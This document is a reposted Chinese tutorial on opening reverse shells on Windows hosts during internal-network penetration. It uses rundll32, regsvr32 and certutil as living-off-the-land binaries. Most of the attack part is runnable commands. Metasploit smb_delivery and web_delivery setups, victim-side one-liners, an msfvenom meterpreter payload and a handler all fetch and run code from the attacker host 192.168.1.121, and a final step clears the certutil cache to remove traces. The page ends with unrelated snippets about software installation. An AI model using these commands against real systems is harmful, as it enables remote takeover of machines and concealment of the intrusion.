内网渗透之Windows反弹shell(二)

编程之家收集整理的这篇文章主要介绍了内网渗透之Windows反弹shell(二)编程之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

概述

内网渗透之Windows反弹shell(二)(03Rundll32.exe、04Regsvr32.exe、05Certutil.exe),下方主要介绍关于内网渗透之Windows反弹shell(二)的全文内容,希望对你有所帮助。

目录

Windows反弹shell

03Rundll32.exe

04Regsvr32.exe

05Certutil.exe


windows反弹shell

03rundll32.exe

rundll32.exe与windows操作系统相关,它允许调用从DLL导出的函数(16位或32位),并将其储存在适当的内存库中。

通过Metasploit的SMB Delivery模块发起rundll32攻击

use exploit/windows/smb/smb_delivery

set srvhost 192.168.1.121

exploit -j

被控端执行

rundll32.exe \\192.168.1.121\qFMnFO\test.dll,0

反弹成功

04Regsvr32.exe

Regsvr32.exe是一个命令行应用程序,用于注册和注销olE控件,如windows注册表中的dll和ActiveX控件
Regsvr32.exe安装windows XP和windows后续版本的 %systemroot%\System32 文件夹中。

语法:Regsvr32 [/s][/u][/n][/i[:cmdline]] <dllname>

/u - 注销服务器

/i - 调用Dllinstall传递一个可选的[cmdline];当它与/u一起使用时·它调用dll来卸载

/n - 不要调用DllRegisterServer;此选项必须与/i一起使用

/s - 沉;不显示消息框

通过msf的Web Delivery模块启动Regsvr32.exe

use exploit/multi/script/web_delivery

set srvhost 192.168.1.121

set target 3

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.121

exploit –j

被控端执行

regsvr32 /s /n /u /i:http://192.168.1.121:8080/yvj3GKJwvde.sct scrobj.dll

反弹成功

05Certutil.exe

Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目计算机中执行恶意的exe文件以获得meterpreter会话。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=6666 -f exe > shell.exe

python3 -m http.server

certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe shell.exe

./shell.exe

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.121

set lport 6666

exploit

清除日志

certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe delete

总结

以上是编程之家为你收集整理的内网渗透之Windows反弹shell(二)全部内容,希望文章能够帮你解决内网渗透之Windows反弹shell(二)所遇到的程序开发问题。

如果觉得编程之家网站内容还不错,欢迎将编程之家网站推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。

Windows文章

一、活动目录(AD)1、了解活动目录的相关概念2、会在Windows服务器上部署域控制器(主/辅),将客户机加入域3、会在域控制器上设置组策略,从而去影响域中的用户和客户机4、扩展(1)如果将一台Windows2003的域提升为Windows2008的域。涉及一问题操作主机的概念(2)如何对域控制器进行备份,在早期的时候,所有的计算机都是独立的个体(每台计算机都有自己的用户或组))想要统一管理,在企业中,部署活动目录服务器,从而对企业中的所有用户及计算机进行集中。......
首先我们需要下载一个vscode1.我们可以在官网下载 VsCode点击橙色区域等待下载完成2.如果觉得麻烦,可以直接点击这里就直接在你的浏览器中下载了,我直接在里面放了下载链接,这个链接的版本是这个当前这个也许是最新的,如果想下载最最最新的可以去官网里面搜寻一番,下载自己相中的。1.当下载结束后,就点击上面图片的打开文件,就会出现下面的页面按照图片步骤,先点击同意协议,然后下一步。2.下一步就是选择要安装这个软件的目标位置一般软件下载的位置都是放在C盘中,但是如果C盘中文件多了就会出现爆满的情况
1.先去官网直接下载解压包进行安装https://dev.mysql.com/downloads/mysql/下载完成后,进行解压到想要的目录下2.进行配置初始化的my.ini文件的文件解压后的目录是没有这个ini文件,自己新建一个my.ini(新建文本文件,将文件类型改为的.ini)写入基本配置:[mysqld]# 设置3306端口port=3306# 设置mysql的安装目录basedir=D:program FilesMySQLmysql-8.0.29-winx64
(本人技术小白一个,如有错误,欢迎各位大神指正。)说明:其实要是装Anaconda的话,就不用再单独装Python了。但是吧,我感觉大部分人都已经装好了Python,因为一般都是先接触的python,然后直接就单独装好了Python,这都不重要,不影响你安装今天的Anaconda。这是我之前装好的python了:下面开始正题:1、 Anaconda的下载: 一般两个选择,一个是官网,另一个是国内镜像网站(建议选择这个)。前者大家都懂,速度感人,所以...
目录前言cuda的下载及安装cuda版本CUDA toolkit Downloadcuda安装cuDNN下载及安装cuDNN下载cuDNN配置参考自前言windows10 版本安装 CUDA ,首先需要下载两个安装包CUDA toolkit(toolkit就是指工具包) cuDNN注:cuDNN 是用于配置深度学习使用官方教程CUDA:Installation Guide Windows :: CUDA Toolkit Documentatio
Windows HostProcess 容器让你能够在 Windows 主机上运行容器化负载。 这类容器以普通的进程形式运行,但能够在具有合适用户特权的情况下, 访问主机网络名字空间、存储和设备。
微信公众号搜索 “ 程序精选 ” ,选择关注!
微信公众号搜 "程序精选"关注